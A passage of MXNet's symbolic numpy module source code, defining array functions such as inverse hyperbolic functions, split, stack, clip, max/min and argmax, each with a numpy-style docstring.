is a multivalued function: for each `x` there are infinitely many numbers `z` such that `sinh(z) = x`. For real-valued input data types, `arcsinh` always returns real output. For each value that cannot be expressed as a real number or infinity, it yields ``nan`` and sets the `invalid` floating point error flag. This function differs from the original numpy.arcsinh in the following aspects: - Do not support `where`, a parameter in numpy which indicates where to calculate. - Do not support complex-valued input. - Cannot cast type automatically. DType of `out` must be same as the expected one. - Cannot broadcast automatically. Shape of `out` must be same as the expected one. - If `x` is plain python numeric, the result won't be stored in out. """ return _unary_func_helper(x, _npi.arcsinh, _np.arcsinh, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def arccosh(x, out=None, **kwargs): r""" Inverse hyperbolic cosine, element-wise. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- arccosh : _Symbol Array of the same shape as `x`. This is a scalar if `x` is a scalar. Notes ----- `arccosh` is a multivalued function: for each `x` there are infinitely many numbers `z` such that `cosh(z) = x`. For real-valued input data types, `arccosh` always returns real output. For each value that cannot be expressed as a real number or infinity, it yields ``nan`` and sets the `invalid` floating point error flag. This function differs from the original numpy.arccosh in the following aspects: - Do not support `where`, a parameter in numpy which indicates where to calculate. - Do not support complex-valued input. - Cannot cast type automatically. Dtype of `out` must be same as the expected one. - Cannot broadcast automatically. Shape of `out` must be same as the expected one. - If `x` is plain python numeric, the result won't be stored in out. """ return _unary_func_helper(x, _npi.arccosh, _np.arccosh, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def arctanh(x, out=None, **kwargs): r""" Inverse hyperbolic tangent, element-wise. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- arctanh : _Symbol Array of the same shape as `x`. This is a scalar if `x` is a scalar. Notes ----- `arctanh` is a multivalued function: for each `x` there are infinitely many numbers `z` such that `tanh(z) = x`. For real-valued input data types, `arctanh` always returns real output. For each value that cannot be expressed as a real number or infinity, it yields ``nan`` and sets the `invalid` floating point error flag. This function differs from the original numpy.arctanh in the following aspects: - Do not support `where`, a parameter in numpy which indicates where to calculate. - Do not support complex-valued input. - Cannot cast type automatically. Dtype of `out` must be same as the expected one. - Cannot broadcast automatically. Shape of `out` must be same as the expected one. - If `x` is plain python numeric, the result won't be stored in out. """ return _unary_func_helper(x, _npi.arctanh, _np.arctanh, out=out, **kwargs) @set_module('mxnet.symbol.numpy') def tile(A, reps): r""" Construct an array by repeating A the number of times given by reps. If `reps` has length ``d``, the result will have dimension of ``max(d, A.ndim)``. If ``A.ndim < d``, `A` is promoted to be d-dimensional by prepending new axes. So a shape (3,) array is promoted to (1, 3) for 2-D replication, or shape (1, 1, 3) for 3-D replication. If this is not the desired behavior, promote `A` to d-dimensions manually before calling this function. If ``A.ndim > d``, `reps` is promoted to `A`.ndim by pre-pending 1's to it. Thus for an `A` of shape (2, 3, 4, 5), a `reps` of (2, 2) is treated as (1, 1, 2, 2). Parameters ---------- A : _Symbol or scalar An input array or a scalar to repeat. reps : a single integer or tuple of integers The number of repetitions of `x` along each axis. Returns ------- c : _Symbol The tiled output array. """ return _unary_func_helper(A, _npi.tile, _np.tile, reps=reps) @set_module('mxnet.symbol.numpy') def arange(start, stop=None, step=1, dtype=None, ctx=None): """Return evenly spaced values within a given interval. Values are generated within the half-open interval ``[start, stop)`` (in other words, the interval including `start` but excluding `stop`). For integer arguments the function is equivalent to the Python built-in `range` function, but returns an ndarray rather than a list. Parameters ---------- start : number, optional Start of interval. The interval includes this value. The default start value is 0. stop : number End of interval. The interval does not include this value, except in some cases where `step` is not an integer and floating point round-off affects the length of `out`. step : number, optional Spacing between values. For any output `out`, this is the distance between two adjacent values, ``out[i+1] - out[i]``. The default step size is 1. If `step` is specified as a position argument, `start` must also be given. dtype : dtype The type of the output array. When npx.is_np_default_dtype() returns False, default dtype is float32; When npx.is_np_default_dtype() returns True, default dtype is float64. Returns ------- arange : _Symbol Array of evenly spaced values. For floating point arguments, the length of the result is ``ceil((stop - start)/step)``. Because of floating point overflow, this rule may result in the last element of `out` being greater than `stop`. """ if ctx is None: ctx = current_context() if stop is None: stop = start start = 0 if step is None: step = 1 if start is None and stop is None: raise ValueError('start and stop cannot be both None') if step == 0: raise ZeroDivisionError('step cannot be 0') return _npi.arange(start=start, stop=stop, step=step, dtype=dtype, ctx=ctx) @set_module('mxnet.symbol.numpy') def delete(arr, obj, axis=None): """ Return a new array with sub-arrays along an axis deleted. For a one dimensional array, this returns those entries not returned by `arr[obj]`. Parameters ---------- arr : _Symbol Input array. obj : slice, scaler or _Symbol of ints Indicate indices of sub-arrays to remove along the specified axis. axis : scaler, optional The axis along which to delete the subarray defined by `obj`. If `axis` is None, `obj` is applied to the flattened array. Returns ------- out : _Symbol A copy of `arr` with the elements specified by `obj` removed. Note that `delete` does not occur in-place. If `axis` is None, `out` is a flattened array. """ if not isinstance(arr, Symbol): raise TypeError("'arr' can not support type {}".format(str(type(arr)))) if isinstance(obj, slice): start = obj.start stop = obj.stop step = 1 if obj.step is None else obj.step return _npi.delete(arr, start=start, stop=stop, step=step, axis=axis) elif isinstance(obj, integer_types): return _npi.delete(arr, int_ind=obj, axis=axis) elif isinstance(obj, Symbol): return _npi.delete(arr, obj, axis=axis) else: raise TypeError("'obj' can not support type {}".format(str(type(obj)))) # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def split(ary, indices_or_sections, axis=0): """Split an array into multiple sub-arrays. Parameters ---------- ary : _Symbol Array to be divided into sub-arrays. indices_or_sections : int or 1-D python tuple, list or set. If `indices_or_sections` is an integer, N, the array will be divided into N equal arrays along `axis`. If such a split is not possible, an error is raised. If `indices_or_sections` is a 1-D array of sorted integers, the entries indicate where along `axis` the array is split. For example, ``[2, 3]`` would, for ``axis=0``, result in - ary[:2] - ary[2:3] - ary[3:] If an index exceeds the dimension of the array along `axis`, an empty sub-array is returned correspondingly. axis : int, optional The axis along which to split, default is 0. Returns ------- sub-arrays : _Symbol A list of sub-arrays. Raises ------ ValueError If `indices_or_sections` is given as an integer, but a split does not result in equal division.""" indices = [] sections = 0 if isinstance(indices_or_sections, int): sections = indices_or_sections elif isinstance(indices_or_sections, (list, set, tuple)): indices = [0] + list(indices_or_sections) else: raise ValueError('indices_or_sections must either int or tuple / list / set of ints') return _npi.split(ary, indices, axis, False, sections) # pylint: enable=redefined-outer-name # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def array_split(ary, indices_or_sections, axis=0): """Split an array into multiple sub-arrays. If `indices_or_sections` is an integer, N, the array will be divided into N equal arrays along `axis`. If such a split is not possible, an array of length l that should be split into n sections, it returns l % n sub-arrays of size l//n + 1 and the rest of size l//n. If `indices_or_sections` is a 1-D array of sorted integers, the entries indicate where along `axis` the array is split. For example, ``[2, 3]`` would, for ``axis=0``, result in - ary[:2] - ary[2:3] - ary[3:] If an index exceeds the dimension of the array along `axis`, an empty sub-array is returned correspondingly. Parameters ---------- ary : _Symbol Array to be divided into sub-arrays. indices_or_sections : int or 1-D Python tuple, list or set. Param used to determine the number and size of the subarray. axis : int, optional The axis along which to split, default is 0. Returns ------- sub-arrays : list of ndarrays A list of sub-arrays. """ indices = [] sections = 0 if isinstance(indices_or_sections, int): sections = indices_or_sections elif isinstance(indices_or_sections, (list, set, tuple)): indices = [0] + list(indices_or_sections) else: raise ValueError('indices_or_sections must either int or tuple / list / set of ints') ret = _npi.array_split(ary, indices, axis, False, sections) if not isinstance(ret, list): return [ret] return ret # pylint: enable=redefined-outer-name # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def hsplit(ary, indices_or_sections): """Split an array into multiple sub-arrays horizontally (column-wise). This is equivalent to ``split`` with ``axis=0`` if ``ary`` has one dimension, and otherwise that with ``axis=1``. Parameters ---------- ary : _Symbol Array to be divided into sub-arrays. indices_or_sections : int, list of ints or tuple of ints. If `indices_or_sections` is an integer, N, the array will be divided into N equal arrays along `axis`. If such a split is not possible, an error is raised. If `indices_or_sections` is a list of sorted integers, the entries indicate where along `axis` the array is split. If an index exceeds the dimension of the array along `axis`, it will raises errors. so index must less than or euqal to the dimension of the array along axis. Returns ------- sub-arrays : _Symbol A list of sub-arrays. Notes ------ - If `indices_or_sections` is given as an integer, but a split does not result in equal division.It will raises ValueErrors. - If indices_or_sections is an integer, and the number is 1, it will raises an error. Because single output from split is not supported yet... See Also -------- split : Split an array into multiple sub-arrays of equal size. Examples -------- >>> x = np.arange(16.0).reshape(4, 4) >>> x array([[ 0., 1., 2., 3.], [ 4., 5., 6., 7.], [ 8., 9., 10., 11.], [12., 13., 14., 15.]]) >>> np.hsplit(x, 2) [array([[ 0., 1.], [ 4., 5.], [ 8., 9.], [12., 13.]]), array([[ 2., 3.], [ 6., 7.], [10., 11.], [14., 15.]])] >>> np.hsplit(x, [3, 6]) [array([[ 0., 1., 2.], [ 4., 5., 6.], [ 8., 9., 10.], [12., 13., 14.]]), array([[ 3.], [ 7.], [11.], [15.]]), array([], shape=(4, 0), dtype=float32)] With a higher dimensional array the split is still along the second axis. >>> x = np.arange(8.0).reshape(2, 2, 2) >>> x array([[[ 0., 1.], [ 2., 3.]], [[ 4., 5.], [ 6., 7.]]]) >>> np.hsplit(x, 2) [array([[[ 0., 1.]], [[ 4., 5.]]]), array([[[ 2., 3.]], [[ 6., 7.]]])] If ``ary`` has one dimension, 'axis' = 0. >>> x = np.arange(4) array([0., 1., 2., 3.]) >>> np.hsplit(x, 2) [array([0., 1.]), array([2., 3.])] If you want to produce an empty sub-array, you can see an example. >>> np.hsplit(x, [2, 2]) [array([0., 1.]), array([], dtype=float32), array([2., 3.])] """ indices = [] sections = 0 if isinstance(indices_or_sections, int): sections = indices_or_sections elif isinstance(indices_or_sections, (list, set, tuple)): indices = [0] + list(indices_or_sections) else: raise ValueError('indices_or_sections must either int or tuple of ints') return _npi.hsplit(ary, indices, 1, False, sections) # pylint: enable=redefined-outer-name # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def vsplit(ary, indices_or_sections): r""" vsplit(ary, indices_or_sections) Split an array into multiple sub-arrays vertically (row-wise). ``vsplit`` is equivalent to ``split`` with `axis=0` (default): the array is always split along the first axis regardless of the array dimension. Parameters ---------- ary : _Symbol Array to be divided into sub-arrays. indices_or_sections : int or 1 - D Python tuple, list or set. If `indices_or_sections` is an integer, N, the array will be divided into N equal arrays along axis 0. If such a split is not possible, an error is raised. If `indices_or_sections` is a 1-D array of sorted integers, the entries indicate where along axis 0 the array is split. For example, ``[2, 3]`` would result in - ary[:2] - ary[2:3] - ary[3:] If an index exceeds the dimension of the array along axis 0, an error will be thrown. Returns ------- sub-arrays : list of _Symbols A list of sub-arrays. See Also -------- split : Split an array into multiple sub-arrays of equal size. Notes ------- This function differs from the original `numpy.degrees <https://docs.scipy.org/doc/numpy/reference/generated/numpy.degrees.html>`_ in the following aspects: - Currently parameter ``indices_or_sections`` does not support ndarray, but supports scalar, tuple and list - In ``indices_or_sections``, if an index exceeds the dimension of the array along axis 0, an error will be thrown. """ indices = [] sections = 0 if isinstance(indices_or_sections, int): sections = indices_or_sections elif isinstance(indices_or_sections, (list, set, tuple)): indices = [0] + list(indices_or_sections) else: raise ValueError('indices_or_sections must either int or tuple of ints') return _npi.split(ary, indices, 0, False, sections) # pylint: enable=redefined-outer-name # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def dsplit(ary, indices_or_sections): """ Split array into multiple sub-arrays along the 3rd axis (depth). Please refer to the `split` documentation. `dsplit` is equivalent to `split` with ``axis=2``, the array is always split along the third axis provided the array dimension is greater than or equal to 3. Parameters ---------- ary : _Symbol Array to be divided into sub-arrays. indices_or_sections : int or 1-D Python tuple, list or set. If `indices_or_sections` is an integer, N, the array will be divided into N equal arrays along axis 2. If such a split is not possible, an error is raised. If `indices_or_sections` is a 1-D array of sorted integers, the entries indicate where along axis 2 the array is split. For example, ``[2, 3]`` would result in - ary[:, :, :2] - ary[:, :, 2:3] - ary[:, :, 3:] If an index exceeds the dimension of the array along axis 2, an error will be thrown. """ indices = [] sections = 0 if isinstance(indices_or_sections, int): sections = indices_or_sections elif isinstance(indices_or_sections, (list, set, tuple)): indices = [0] + list(indices_or_sections) else: raise ValueError('indices_or_sections must either int or tuple of ints') return _npi.dsplit(ary, indices, 2, False, sections) # pylint: enable=redefined-outer-name @set_module('mxnet.symbol.numpy') def concatenate(seq, axis=0, out=None): """Join a sequence of arrays along an existing axis. Parameters ---------- a1, a2, ... : sequence of _Symbols The arrays must have the same shape, except in the dimension corresponding to `axis` (the first, by default). axis : int, optional The axis along which the arrays will be joined. If axis is None, arrays are flattened before use. Default is 0. out : ndarray, optional If provided, the destination to place the result. The shape must be correct, matching that of what concatenate would have returned if no out argument were specified. Returns ------- res : _Symbol The concatenated array. Examples -------- >>> a = np.array([[1, 2], [3, 4]]) >>> b = np.array([[5, 6]]) >>> np.concatenate((a, b), axis=0) array([[1., 2.], [3., 4.], [5., 6.]]) >>> np.concatenate((a, b), axis=None) array([1., 2., 3., 4., 5., 6.]) >>> np.concatenate((a, b.T), axis=1) array([[1., 2., 5.], [3., 4., 6.]]) """ return _npi.concatenate(*seq, axis=axis, out=out) @set_module('mxnet.symbol.numpy') def append(arr, values, axis=None): # pylint: disable=redefined-outer-name """ Append values to the end of an array. Parameters ---------- arr : _Symbol Values are appended to a copy of this array. values : _Symbol These values are appended to a copy of `arr`. It must be of the correct shape (the same shape as `arr`, excluding `axis`). If `axis` is not specified, `values` can be any shape and will be flattened before use. axis : int, optional The axis along which `values` are appended. If `axis` is not given, both `arr` and `values` are flattened before use. Returns ------- append : _Symbol A copy of `arr` with `values` appended to `axis`. Note that `append` does not occur in-place: a new array is allocated and filled. If `axis` is None, `out` is a flattened array. Examples -------- >>> np.append(np.array([1, 2, 3]), np.array([[4, 5, 6],[7, 8, 9]])) array([1., 2., 3., 4., 5., 6., 7., 8., 9.]) When `axis` is specified, `values` must have the correct shape. >>> np.append(np.array([[1, 2, 3], [4, 5, 6]]), np.array([[7, 8, 9]]), axis=0) array([[1., 2., 3.], [4., 5., 6.], [7., 8., 9.]]) """ return _npi.concatenate(arr, values, axis=axis, out=None) @set_module('mxnet.symbol.numpy') def stack(arrays, axis=0, out=None): """Join a sequence of arrays along a new axis. The axis parameter specifies the index of the new axis in the dimensions of the result. For example, if `axis=0` it will be the first dimension and if `axis=-1` it will be the last dimension. Parameters ---------- arrays : sequence of _Symbols Each array must have the same shape. axis : int, optional The axis in the result array along which the input arrays are stacked. out : _Symbol, optional If provided, the destination to place the result. The shape must be correct, matching that of what stack would have returned if no out argument were specified. Returns ------- stacked : _Symbol The stacked array has one more dimension than the input arrays.""" def get_list(arrays): if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'): raise ValueError("expected iterable for arrays but got {}".format(type(arrays))) return [arr for arr in arrays] arrays = get_list(arrays) return _npi.stack(*arrays, axis=axis, out=out) @set_module('mxnet.symbol.numpy') def vstack(arrays, out=None): r"""Stack arrays in sequence vertically (row wise). This is equivalent to concatenation along the first axis after 1-D arrays of shape `(N,)` have been reshaped to `(1,N)`. Rebuilds arrays divided by `vsplit`. This function makes most sense for arrays with up to 3 dimensions. For instance, for pixel-data with a height (first axis), width (second axis), and r/g/b channels (third axis). The functions `concatenate` and `stack` provide more general stacking and concatenation operations. Parameters ---------- tup : sequence of _Symbol The arrays must have the same shape along all but the first axis. 1-D arrays must have the same length. Returns ------- stacked : _Symbol The array formed by stacking the given arrays, will be at least 2-D. """ def get_list(arrays): if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'): raise ValueError("expected iterable for arrays but got {}".format(type(arrays))) return [arr for arr in arrays] arrays = get_list(arrays) return _npi.vstack(*arrays) @set_module('mxnet.symbol.numpy') def row_stack(arrays): r"""Stack arrays in sequence vertically (row wise). This is equivalent to concatenation along the first axis after 1-D arrays of shape `(N,)` have been reshaped to `(1,N)`. Rebuilds arrays divided by `vsplit`. This function makes most sense for arrays with up to 3 dimensions. For instance, for pixel-data with a height (first axis), width (second axis), and r/g/b channels (third axis). The functions `concatenate` and `stack` provide more general stacking and concatenation operations. Parameters ---------- tup : sequence of _Symbol The arrays must have the same shape along all but the first axis. 1-D arrays must have the same length. Returns ------- stacked : _Symbol The array formed by stacking the given arrays, will be at least 2-D. """ def get_list(arrays): if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'): raise ValueError("expected iterable for arrays but got {}".format(type(arrays))) return [arr for arr in arrays] arrays = get_list(arrays) return _npi.vstack(*arrays) @set_module('mxnet.symbol.numpy') def column_stack(tup): """ Stack 1-D arrays as columns into a 2-D array. Take a sequence of 1-D arrays and stack them as columns to make a single 2-D array. 2-D arrays are stacked as-is, just like with `hstack`. 1-D arrays are turned into 2-D columns first. Parameters ---------- tup : sequence of 1-D or 2-D arrays. Arrays to stack. All of them must have the same first dimension. Returns ------- stacked : 2-D array The array formed by stacking the given arrays. See Also -------- stack, hstack, vstack, concatenate Examples -------- >>> a = np.array((1,2,3)) >>> b = np.array((2,3,4)) >>> np.column_stack((a,b)) array([[1., 2.], [2., 3.], [3., 4.]]) """ return _npi.column_stack(*tup) @set_module('mxnet.symbol.numpy') def hstack(arrays): """ Stack arrays in sequence horizontally (column wise). This is equivalent to concatenation along the second axis, except for 1-D arrays where it concatenates along the first axis. Rebuilds arrays divided by hsplit. This function makes most sense for arrays with up to 3 dimensions. For instance, for pixel-data with a height (first axis), width (second axis), and r/g/b channels (third axis). The functions concatenate, stack and block provide more general stacking and concatenation operations. Parameters ---------- tup : _Symbol The arrays must have the same shape along all but the second axis, except 1-D arrays which can be any length. Returns ------- stacked : _Symbol The array formed by stacking the given arrays. Examples -------- >>> from mxnet import np,npx >>> a = np.array((1,2,3)) >>> b = np.array((2,3,4)) >>> np.hstack((a,b)) array([1., 2., 3., 2., 3., 4.]) >>> a = np.array([[1],[2],[3]]) >>> b = np.array([[2],[3],[4]]) >>> np.hstack((a,b)) array([[1., 2.], [2., 3.], [3., 4.]]) """ return _npi.hstack(*arrays) @set_module('mxnet.symbol.numpy') def dstack(arrays): """ Stack arrays in sequence depth wise (along third axis). This is equivalent to concatenation along the third axis after 2-D arrays of shape `(M,N)` have been reshaped to `(M,N,1)` and 1-D arrays of shape `(N,)` have been reshaped to `(1,N,1)`. Rebuilds arrays divided by `dsplit`. This function makes most sense for arrays with up to 3 dimensions. For instance, for pixel-data with a height (first axis), width (second axis), and r/g/b channels (third axis). The functions `concatenate`, `stack` and `block` provide more general stacking and concatenation operations. Parameters ---------- tup : sequence of _Symbol The arrays must have the same shape along all but the first axis. 1-D arrays must have the same length. Returns ------- stacked : _Symbol The array formed by stacking the given arrays, will be at least 2-D. """ return _npi.dstack(*arrays) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def maximum(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.maximum, _np.maximum, _npi.maximum_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def fmax(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.fmax, _np.fmax, _npi.fmax_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def minimum(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.minimum, _np.minimum, _npi.minimum_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def fmin(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.fmin, _np.fmin, _npi.fmin_scalar, None, out) @set_module('mxnet.symbol.numpy') def max(a, axis=None, out=None, keepdims=False): """ Return the maximum of an array or maximum along an axis. Parameters ---------- a : _Symbol Input data. axis : int, optional Axis along which to operate. By default, flattened input is used. out : ndarray, optional Alternative output array in which to place the result. Must be of the same shape and buffer length as the expected output. See `doc.ufuncs` (Section "Output arguments") for more details. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the original `arr`. Returns ------- max : _Symbol Maximum of `a`. If `axis` is None, the result is an array of dimension 1. If `axis` is given, the result is an array of dimension ``a.ndim - 1``. See Also -------- min : The minimum value of an array along a given axis, ignoring any nan. maximum : Element-wise maximum of two arrays, ignoring any nan. argmax : Return the indices of the maximum values. Notes ----- NaN in the orginal `numpy` is denoted as nan and will be ignored. Don't use `max` for element-wise comparison of 2 arrays; when ``a.shape[0]`` is 2, ``maximum(a[0], a[1])`` is faster than ``max(a, axis=0)``. """ return _npi.max(a, axis=axis, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def min(a, axis=None, out=None, keepdims=False): """ Return the minimum of an array or minimum along an axis. Parameters ---------- a : ndarray Input data. axis : int, optional Axis along which to operate. By default, flattened input is used. out : ndarray, optional Alternative output array in which to place the result. Must be of the same shape and buffer length as the expected output. See `doc.ufuncs` (Section "Output arguments") for more details. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the original `arr`. Returns ------- min : ndarray Minimum of `a`. If `axis` is None, the result is an array of dimension 1. If `axis` is given, the result is an array of dimension ``a.ndim - 1``. See Also -------- max : The maximum value of an array along a given axis, ignoring any nan. minimum : Element-wise minimum of two arrays, ignoring any nan. Notes ----- NaN in the orginal `numpy` is denoted as nan and will be ignored. Don't use `min` for element-wise comparison of 2 arrays; when ``a.shape[0]`` is 2, ``minimum(a[0], a[1])`` is faster than ``min(a, axis=0)``. """ return _npi.min(a, axis=axis, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def amax(a, axis=None, out=None, keepdims=False): """ Return the maximum of an array or maximum along an axis. Parameters ---------- a : ndarray Input data. axis : int, optional Axis along which to operate. By default, flattened input is used. out : ndarray, optional Alternative output array in which to place the result. Must be of the same shape and buffer length as the expected output. See `doc.ufuncs` (Section "Output arguments") for more details. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the original `arr`. Returns ------- max : ndarray Maximum of `a`. If `axis` is None, the result is an array of dimension 1. If `axis` is given, the result is an array of dimension ``a.ndim - 1``. See Also -------- min : The minimum value of an array along a given axis, ignoring any nan. maximum : Element-wise maximum of two arrays, ignoring any nan. argmax : Return the indices of the maximum values. Notes ----- NaN in the orginal `numpy` is denoted as nan and will be ignored. Don't use `max` for element-wise comparison of 2 arrays; when ``a.shape[0]`` is 2, ``maximum(a[0], a[1])`` is faster than ``max(a, axis=0)``. """ return _npi.amax(a, axis=axis, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def amin(a, axis=None, out=None, keepdims=False): """ Return the minimum of an array or minimum along an axis. Parameters ---------- a : ndarray Input data. axis : int, optional Axis along which to operate. By default, flattened input is used. out : ndarray, optional Alternative output array in which to place the result. Must be of the same shape and buffer length as the expected output. See `doc.ufuncs` (Section "Output arguments") for more details. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the original `arr`. Returns ------- min : ndarray Minimum of `a`. If `axis` is None, the result is an array of dimension 1. If `axis` is given, the result is an array of dimension ``a.ndim - 1``. See Also -------- max : The maximum value of an array along a given axis, ignoring any nan. minimum : Element-wise minimum of two arrays, ignoring any nan. Notes ----- NaN in the orginal `numpy` is denoted as nan and will be ignored. Don't use `min` for element-wise comparison of 2 arrays; when ``a.shape[0]`` is 2, ``minimum(a[0], a[1])`` is faster than ``min(a, axis=0)``. """ return _npi.amin(a, axis=axis, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def all(a, axis=None, out=None, keepdims=False): """ Test whether all array elements along a given axis evaluate to True. Parameters ---------- a : _Symbol Input array or object that can be converted to an array. axis : None or int or tuple of ints, optional Axis or axes along which a logical AND reduction is performed. The default (axis = None) is to perform a logical AND over all the dimensions of the input array. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the input array. out : ndarray, optional Alternate output array in which to place the result. It must have the same shape as the expected output and its type is preserved Returns -------- all : _Symbol, bool A new boolean or array is returned unless out is specified, in which case a reference to out is returned. """ return _npi.all(a, axis=axis, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def any(a, axis=None, out=None, keepdims=False): """ Test whether any array element along a given axis evaluates to True. Returns single boolean unless axis is not None Parameters ---------- a : _Symbol Input array or object that can be converted to an array. axis : None or int or tuple of ints, optional Axis or axes along which a logical AND reduction is performed. The default (axis = None) is to perform a logical AND over all the dimensions of the input array. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the input array. out : ndarray, optional Alternate output array in which to place the result. It must have the same shape as the expected output and its type is preserved Returns -------- any : bool or _Symbol A new boolean or ndarray is returned unless out is specified, in which case a reference to out is returned. """ return _npi.any(a, axis=axis, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def clip(a, a_min, a_max, out=None): """clip(a, a_min, a_max, out=None) Clip (limit) the values in an array. Given an interval, values outside the interval are clipped to the interval edges. For example, if an interval of ``[0, 1]`` is specified, values smaller than 0 become 0, and values larger than 1 become 1. Parameters ---------- a : _Symbol Array containing elements to clip. a_min : scalar or `None` Minimum value. If `None`, clipping is not performed on lower interval edge. Not more than one of `a_min` and `a_max` may be `None`. a_max : scalar or `None` Maximum value. If `None`, clipping is not performed on upper interval edge. Not more than one of `a_min` and `a_max` may be `None`. out : _Symbol or `None` The results will be placed in this array. It may be the input array for in-place clipping. `out` must be of the right shape to hold the output. Its type is preserved. Returns ------- clipped_array : _Symbol An array with the elements of `a`, but where values < `a_min` are replaced with `a_min`, and those > `a_max` with `a_max`. Notes ----- array_like `a_min` and `a_max` are not supported. """ if a_min is None and a_max is None: raise ValueError('array_clip: must set either max or min') if a_min is None: a_min = float('-inf') if a_max is None: a_max = float('inf') return _npi.clip(a, a_min, a_max, out=out) @set_module('mxnet.symbol.numpy') def swapaxes(a, axis1, axis2): """Interchange two axes of an array. Parameters ---------- a : _Symbol Input array. axis1 : int First axis. axis2 : int Second axis. Returns ------- a_swapped : _Symbol Swapped array symbol. """ return _npi.swapaxes(a, dim1=axis1, dim2=axis2) @set_module('mxnet.symbol.numpy') def argmax(a, axis=None, out=None): r""" Returns the indices of the maximum values along an axis. Parameters ---------- a : _Symbol Input array. Only support dtype `float16`, `float32`, and `float64`. axis : int, optional By default, the index is into the flattened array, otherwise along the specified axis. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- index_array : _Symbol of indices whose dtype is same as the input ndarray. Array of indices into the array. It has the same shape as `a.shape` with the dimension along `axis` removed. Notes ----- In case of multiple occurrences of the maximum values, the indices corresponding to the first occurrence are returned. This function differs from the original `numpy.argmax <https://docs.scipy.org/doc/numpy/reference/generated/numpy.argmax.html>`_ in the following aspects: - Input type does not support Python native iterables(list, tuple, ...). - ``out`` param: cannot perform auto broadcasting. ``out`` symbol's shape must be the same as the expected output. - ``out`` param: cannot perform auto type cast. ``out`` symnbol's dtype must be the same as the expected output. - ``out`` param does not support scalar input case. """ return _npi.argmax(a, axis=axis, keepdims=False, out=out) @set_module('mxnet.symbol.numpy') def argmin(a, axis=None, out=None): r""" Returns the indices of the minimum values along an axis. Parameters ---------- a : _Symbol Input array. Only support dtype `float16`, `float32`, and `float64`. axis : int, optional By default, the index is into the flattened array, otherwise along the specified axis. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- index_array : _Symbol of indices whose dtype is same as the input ndarray. Array of indices into the array. It has the same shape as `a.shape` with the dimension along `axis` removed. Notes ----- In case of multiple occurrences of the minimum values, the indices corresponding to the first occurrence are returned. This function differs from the original `numpy.argmin <https://docs.scipy.org/doc/numpy/reference/generated/numpy.argmin.html>`_ in the following aspects: - Input type does not support Python native iterables(list, tuple, ...). - ``out`` param: cannot perform auto broadcasting. ``out`` symbol's shape must be the same as the expected output. - ``out`` param: cannot perform auto type cast. ``out`` symnbol's dtype must be the same as the expected output. - ``out`` param does not support scalar input case. """ return _npi.argmin(a, axis=axis, keepdims=False, out=out) def average(a, axis=None, weights=None, returned=False, out=None): """ Compute the weighted average along the specified axis. Parameters -------- a : _Symbol Array containing data to be averaged. axis : None or int or tuple of ints, optional Axis or axes along which to average a. The default, axis=None, will average over all of the elements of the input array. If axis is negative it counts from the last to the first axis. New in version 1.7.0. If axis is a tuple of ints, averaging is performed on all of the axes specified in the tuple instead of a single axis or all the axes as before. weights : _Symbol, optional An array of weights associated with the values in a, must be the same dtype with a. Each value in a contributes to the average according to its associated weight. The weights array can either be 1-D (in which case its length must be the size of a along the given axis) or of the same shape as a. If weights=None, then all data in a are assumed to have a weight equal to one. The 1-D calculation is: avg = sum(a * weights) / sum(weights) The only constraint on weights is that sum(weights) must not be 0. returned : bool, optional Default is False. If True, the tuple (average, sum_of_weights) is returned, otherwise only the average is returned. If weights=None, sum_of_weights is equivalent to the number of elements over which the average is taken. out : _Symbol, optional If provided, the calculation is done into this array. Returns -------- retval, [sum_of_weights] : _Symbol Return the average along the specified axis. When returned is True, return a tuple with the average as the first element and the sum of the weights as the second element. sum_of_weights is of the same type as retval. If a is integral, the result dtype will beyour current default dtype, When npx.is_np_default_dtype() returns False, default dtype is float32, When npx.is_np_default_dtype() returns True, default dtype is float64; otherwise it will be the same as dtype of a. Raises -------- MXNetError - When all weights along axis sum to zero. - When the length of 1D weights is not the same as the shape of a along axis. - When given 1D weights, the axis is not specified or is not int. - When the shape of weights and a differ, but weights are not 1D. See also -------- mean Notes -------- This function differs from the original `numpy.average` <https://numpy.org/devdocs/reference/generated/numpy.average.html>`_ in the following way(s): - Does not guarantee the same behavior with 